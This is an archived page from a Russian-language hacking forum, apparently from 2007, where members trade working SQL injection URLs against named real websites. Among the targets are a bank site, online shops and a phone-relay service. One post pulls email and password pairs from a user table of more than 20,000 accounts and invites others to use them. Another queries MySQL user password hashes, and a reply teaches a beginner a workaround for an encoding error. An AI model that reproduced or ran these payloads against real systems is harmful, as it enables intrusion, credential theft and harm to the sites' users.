FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 90 из 1602

Опции темы

Поиск в этой теме

Опции просмотра

12.03.2007, 05:09

VampiRUS

Участник форума

Регистрация: 31.12.2005

Сообщений: 231

Провел на форуме:
1106266

Репутация: 366

Отправить сообщение для VampiRUS с помощью Yahoo

Код:

http://www.fondsk.ru/article.php?id=-1+union+select+1,2,3,4,5,USER(),VERSION(),8,9,0,1,2,3,4,5,6,7,8,9,0,1/*

12.03.2007, 06:21

Horsekiller

Познающий

Регистрация: 22.11.2006

Сообщений: 68

Провел на форуме:
682079

Репутация: 137

Код:

http://www.yuretz.ru/prikol.php?id=-1+union+select+1,222,333,4,5,6,7,888,9,1,2,3/*

Первая скуль, поэтому на правах нуба задам вопросик:
вот выше я подобрал количество, но когда я делаю такой запрос:

Код:

http://www.yuretz.ru/prikol.php?id=-1+union+select+1,user(),333,4,5,6,7,888,9,1,2,3/*

получаю пинка

Цитата:

Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

Понятно, что 2 несовместимых кодировки для юнион, но как с этим бороться?) Сорри если глупость.

Учебник по MySQL только начал курить)

12.03.2007, 06:24

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Цитата:

Сообщение от Horsekiller

но как с этим бороться?) Сорри если глупость.

Учебник по MySQL только начал курить)

Просто нужно использовать конвертирование в нужную тебе кодировку... Как ты наверно заметил тебе нужна cp1251:

Код:

http://www.yuretz.ru/prikol.php?id=-1+union+select+1,convert(user()+using+cp1251),333,4,5,6,7,888,9,1,2,3/*

12.03.2007, 07:28

VampiRUS

Участник форума

Регистрация: 31.12.2005

Сообщений: 231

Провел на форуме:
1106266

Репутация: 366

Цитата:

Сообщение от Horsekiller

Код:

http://www.yuretz.ru/prikol.php?id=-1+union+select+1,222,333,4,5,6,7,888,9,1,2,3/*

Код:

http://www.yuretz.ru/prikol.php?id=-1+union+select+1,user(),333,4,5,6,7,888,9,1,2,3/*

получаю пинка
Понятно, что 2 несовместимых кодировки для юнион, но как с этим бороться?) Сорри если глупость.

Учебник по MySQL только начал курить)

Я уже выкладывал

Код:

http://www.xmlhack.com/read.php?item=-1+union+select+1,2,3,4,5,6,7,8,TABLE_NAME,0,1+from+information_schema.tables/*

Последний раз редактировалось VampiRUS; 12.03.2007 в 07:37..

12.03.2007, 12:35

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

Цитата:

http://www.tsb.kz/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

Сайт банка)

12.03.2007, 14:10

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

Код:

http://www.careysookocheff.com/index.php?id=-1+union+select+1,version(),3/*

12.03.2007, 09:29

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Я так понял, тут звонки по Америке нахаляву

правда х3 каким образом, но все же

http://www.i711.com/about.php
сама инъекция:

Код:

http://www.i711.com/my711.php?tab=2&article=-1+union+select+1,2,concat(email,0x3a,passwd),4,5,6,7,8,9+from+users+limit+20623,1/*

20624 юзера, мыла:пароли в чистом виде.
пользуйтесь

12.03.2007, 13:05

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

http://www.globelines.com.ph/FAQCategory.php?id=-8+union+select+1,2,convert(version()+using+latin1) ,4,5,6,7,8

----

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

12.03.2007, 13:11

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

Какойто интернет магазин.

Цитата:

http://www.iradium.fr/fr/carte/carte_destination.php?id=-1+union+select+concat(user,char(58),password),2,3+ from+mysql.user+limit+0,1/*

___

Код:

http://www.linspire.com/linspire_letter_archives.php?id=-1+union+select+1,version(),3,4/*

___

Код:

http://www.urallink.ru/stat.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

Последний раз редактировалось Colkru; 12.03.2007 в 13:29..

#10

12.03.2007, 13:34

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

Код:

http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=-232+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

http://www.newssamara.ru/showNews.php?id=-1+union+select+111,222,333,444,555,version(),777,888,999,1010,1111,1212,1313,1414,1515/*

Последний раз редактировалось -=lebed=-; 12.03.2007 в 14:13..